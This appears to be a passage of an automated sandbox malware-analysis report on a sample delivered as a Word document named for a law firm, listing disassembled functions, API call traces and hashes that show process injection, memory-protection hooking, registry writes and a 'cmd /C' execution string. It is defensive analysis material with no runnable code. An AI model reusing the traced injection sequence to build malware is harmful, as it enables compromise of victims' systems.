    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: cmd.exe Analysis ID: 544867

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:247
Initial Analysis Report:Open
Initial sample Analysis ID:544867
Initial sample SHA 256:1C63CA41136F1CBE7E2E541D92D6B3EB70A79374F172FBD7157DA4018BFEB8D2
Initial sample name:THE_HARRION_LAW_FIRM_Request.doc

Similar Executed Functions

Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
